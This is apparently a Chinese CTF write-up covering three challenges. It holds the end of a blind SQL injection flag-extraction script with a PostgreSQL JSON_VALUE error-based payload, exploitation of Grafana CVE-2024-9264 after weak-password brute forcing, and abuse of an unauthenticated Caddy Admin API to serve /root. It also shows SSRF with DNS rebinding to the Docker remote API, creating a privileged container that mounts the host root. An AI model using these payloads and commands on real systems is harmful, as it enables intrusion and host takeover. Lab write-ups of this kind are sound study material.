            print(json.dumps(fetch_material(session, args.base, args.timeout), indent=2))
            return 0

        if args.cmd == "sign":
            material, sign = sign_from_args_or_fetch(
                session, args.base, args.timeout, args
            )
            print(
                json.dumps(
                    {
                        "q": args.q,
                        "method": args.method,
                        "path": args.path,
                        "nonce": material["nonce"],
                        "ts": int(material["ts"]),
                        "seed": material["seed"],
                        "salt": material["salt"],
                        "sign": sign,
                    },
                    indent=2,
                )
            )
            return 0

        if args.cmd == "query":
            status, data, material, sign = do_query(
                session, args.base, args.timeout, args.q
            )
            if args.show_material:
                print("[material]")
                print(json.dumps(material, indent=2))
            if args.show_sign:
                print("[sign]")
                print(sign)
            print(f"[http_status] {status}")
            print(json.dumps(data, indent=2, ensure_ascii=False))
            return 0 if status == 200 else 1

        if args.cmd == "pick-template":
            print(pick_template(session, args.base, args.timeout))
            return 0

        if args.cmd == "check-cond":
            template = args.template or pick_template(session, args.base, args.timeout)
            value = check_cond(session, args.base, args.timeout, args.cond, template)
            print(
                json.dumps(
                    {
                        "condition": args.cond,
                        "template": template,
                        "result": value,
                    },
                    indent=2,
                )
            )
            return 0

        if args.cmd == "dump-flag":
            template = args.template or pick_template(session, args.base, args.timeout)
            length = extract_length(
                session,
                args.base,
                args.timeout,
                template,
                args.expr,
                args.max_len,
            )
            chars = []
            for pos in range(1, length + 1):
                ch = extract_char(
                    session,
                    args.base,
                    args.timeout,
                    template,
                    args.expr,
                    pos,
                    args.low,
                    args.high,
                )
                chars.append(ch)
                sys.stdout.write("\r" + "".join(chars))
                sys.stdout.flush()
            sys.stdout.write("\n")
            print(
                json.dumps(
                    {
                        "expr": args.expr,
                        "length": length,
                        "template": template,
                        "value": "".join(chars),
                    },
                    indent=2,
                    ensure_ascii=False,
                )
            )
            return 0

        parser.error("unknown command")
        return 2
    except Exception as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 1


if __name__ == "__main__":
    raise SystemExit(main())

最后运行python decrypt_app_sign.py dump-flag就可以解出来了

不过这里的话是用的PG17 中 JSON_VALUE 的强制转型报错

JSON_VALUE('{"a":"x"}','$.a' RETURNING INTEGER ERROR ON ERROR)

这里JSON_VALUE会尝试从JSON中提取$.a的值，也就是x，然后RETURNING INTEGER会尝试转化成整数，但是这里x没法转为整数，所以会报错，ERROR ON ERROR表示出错时会抛出异常

所以结合case语句可以打入这样的poc

' || (SELECT CASE WHEN (<cond>)
     THEN JSON_VALUE('{"a":"x"}','$.a' RETURNING INTEGER ERROR ON ERROR)
     ELSE 0 END) || '

cond就是打的二分注入

length((select flag from secrets limit 1)) > mid
ascii(substr((select flag from secrets limit 1), pos, 1)) > mid

SU_Thief

The lazy admin neglected that the closest thief around him could help him steal /root/flag
那个懒惰的管理员忽视了他周围的最近的小偷可以帮助他偷 /root/flag

给ai分析了一下页面源代码提取一下版本信息，发现是Grafana v11.0.0，翻到一个历史cve CVE-2024-9264，但是是后台漏洞

"sql_expressions":true

这个 feature toggle 对应 CVE-2024-9264，Grafana 的 SQL Expression 功能在 11.0.x 中存在通过 DuckDB 执行任意命令的漏洞。

"publicDashboards":true
"publicDashboardsEnabled":true
"publicDashboardAccessToken":""
"anonymousEnabled":false

公开 Dashboard 功能是开启的，匿名访问关闭

#爆破登录+CVE-2024-9264

尝试弱口令爆破一下登录页面拿到密码1q2w3e

既然知道了密码就可以直接打cve ，用github的poc：https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit 反弹shell

但是没想到还有第二关

这里发现tmp目录下有很多东西，后面才反应过来别人写进来的！服了，忘记是公共靶机了

#Caddy Admin API 未鉴权

$ ps aux | grep root
root           1  0.0  0.0   2884   984 ?        Ss   Mar14   0:00 /bin/sh /start.sh
root           9  0.6  0.6 1269540 52528 ?       Sl   Mar14  11:42 caddy run --config /etc/caddy/caddy_config.json
root          22  0.0  0.0   2884   108 ?        S    Mar14   0:00 /bin/sh /start.sh
root          54  0.0  0.0   6208  3476 ?        S    Mar14   0:00 su -s /bin/bash grafana -c  /usr/share/grafana/bin/grafana-server   --homepath=/usr/share/grafana   --config=/etc/grafana/grafana.ini   --packaging=docker   cfg:default.log.mode=console 
root          56  0.0  0.0   2816  1040 ?        S    Mar14   0:07 tail -f /dev/null
root       43171  0.0  0.0   2784  1016 ?        S    10:09   0:00 sleep 300
grafana    43173  0.0  0.0   3464  1616 ?        S    10:10   0:00 grep root

列出系统所有进程，然后过滤出包含 “root” 的进程

发现root跑了一个Caddy Web Server 进程，尝试访问一下Caddy 的 Admin API

$ curl http://localhost:2019/config/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   150  100   150    0     0  74812      0 --:--:-- --:--:-- --:--:--  146k
{"apps":{"http":{"servers":{"srv0":{"listen":[":80"],"routes":[{"handle":[{"handler":"reverse_proxy","upstreams":[{"dial":"127.0.0.1:3000"}]}]}]}}}}}

{
    "apps": {
        "http": {
            "servers": {
                "srv0": {
                    "listen": [":80"],
                    "routes": [
                        {
                            "handle": [
                                {
                                    "handler": "reverse_proxy",
                                    "upstreams": [
                                        {
                                            "dial": "127.0.0.1:3000"
                                        }
                                    ]
                                }
                            ]
                        }
                    ]
                }
            }
        }
    }
}

Caddy 默认在 localhost:2019 开放管理 API，并且这里没有 Admin API 鉴权配置，任何本地用户都可以调用。

并且利用curl可以直接动态修改caddy的配置

file_server 是 Caddy 内置模块，可以用这个模块将静态文件服务目录进行修改，我们尝试修改为/root

curl -s -X POST http://localhost:2019/load -H "Content-Type: application/json" --data-raw '{"apps":{"http":{"servers":{"srv0":{"listen":[":80"],"routes":[{"handle":[{"handler":"file_server","root":"/root"}]}]}}}}}'

然后我们请求一下目录下的flag就行了

curl http://localhost:80/flag

SU_uri

#SSRF打DNS重绑定+Docker 逃逸

Meng spotted a simple webhook. Are there any attack vectors here?
Meng 发现了一个简单的 webhook。这里有任何攻击向量吗？

打开环境是一个Webhook转发调试器，需要传入请求地址以及body请求体内容

看着很像SSRF，我们尝试测一下

确实是存在的

但是过滤了一些东西，例如127.0.0.1这种都没法写，尝试用十六进制发现有新的回显

{"message":"resolve failed: lookup 0x7f000001 on 127.0.0.11:53: server misbehaving"}

好吧好像这里是因为并没有当成ip去解析而是走的Docker内置DNS服务器去做dns解析了

有可能是先做DNS解析然后才检查IP的？

试着做一下DNS重绑定

{
  "url": "http://127.0.0.1.nip.io/",
  "body": "{ \"event\": \"ping\" }"
}

http://127.0.0.1.nip.io 其实是一个用来把域名自动解析成指定 IP 的方法，nip.io 是一个 通配 DNS 服务。

回显

{"message":"blocked IP: 127.0.0.1"}

好吧，确实是先做了DNS解析然后才进行IP的检查的，那试着打一下DNS重绑定

试了之后发现只能用 rr.1u.ms 做重绑定

格式：{前缀}-make-{安全IP}-rebind-{目标IP}-rr.1u.ms

{
  "url": "http://test1-make-156.239.238.130-rebind-127.0.0.1-rr.1u.ms:8080/",
  "body": "{ \"event\": \"ping\" }"
,"eolxp2nlc7t":"="}

然后在服务器上用nc开启8080服务监听

发现成功了，成功请求到题目页面

然后看看能不能找到flag，需要注意这里的前缀要经常换

但是这里仅仅只是能打ssrf，没法达到命令执行的效果

因为前面发现存在docker内置DNS服务解析，所以看看能不能打docker逃逸

看到一个Docker 远程 API 未授权访问逃逸

https://wiki.teamssix.com/cloudnative/docker/docker-remote-api-unauth-escape.html

https://www.cnblogs.com/yuy0ung/articles/18819294

探测一下2375端口发现回显404（需要多试几次，因为这个dns重绑定不太稳定）

能确认存在该漏洞，然后尝试访问/version获取版本信息，但是我一直没访问成功，估计需要GET请求？我整不出这里

那就直接创建一个容器

http://[任意前缀]-make-38.55.99.239-rebind-127.0.0.1-rr.1u.ms:2375/containers/create

body:
{"Image":"alpine","Cmd":["/bin/sh","-c","sleep 600"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}

这里的话sleep 600是为了让容器运行久一点，不然后面就没了

解释一下body参数

{
    "Image":"alpine",
    "Cmd":["/bin/sh","-c","sleep 600"],	--保持容器存活供后续 exec 使用
    "HostConfig":
    {
        "Binds":["/:/host"],	--宿主机 / 根目录 挂载到容器 /host/
        "Privileged":true	-- 获取完整宿主机权限
    }
}

回显了容器ID

{
  "message": "forwarded",
  "target_status": 201,
  "target_body": "{\"Id\":\"c2255a928ad8a4b2a14238b9f685aca6dcebb17c7fad20dc97ad2b296c54a5fc\",\"Warnings\":[]}\n"
}

然后启动容器

http://[任意前缀]-make-38.55.99.239-rebind-127.0.0.1-rr.1u.ms:2375/containers/[id]/start

body:
{}

出现204就表示启动成功了

然后创建一个exec实例

http://[任意前缀]-make-38.55.99.239-rebind-127.0.0.1-rr.1u.ms:2375/containers/[id]/exec

{"AttachStdout":true,"AttachStderr":true,"Cmd":["/bin/sh","-c","ls /"]}

拿到exec ID

{
  "message": "forwarded",
  "target_status": 201,
  "target_body": "{\"Id\":\"12d2eb1564fc34f189ae7af8f4b045affdbd950d9345149d527e8d72eacf2609\"}\n"
}

最后启动 exec

http://[任意前缀]-make-38.55.99.239-rebind-127.0.0.1-rr.1u.ms:2375/exec/[exec实例id]/start

{"Detach":false,"Tty":false}

解释一下body

{
    "Detach":false,		--false为前台运行，webhook 同步等待命令执行完，把输出一起返回
    "Tty":false			--false为不分配终端，输出用 multiplexed stream 格式，前8字节是 header
}

成功RCE，后面再重新创建容器或者直接创建exec实例并启动就行了

当然反弹shell的话也是可以的，但是需要用nc去弹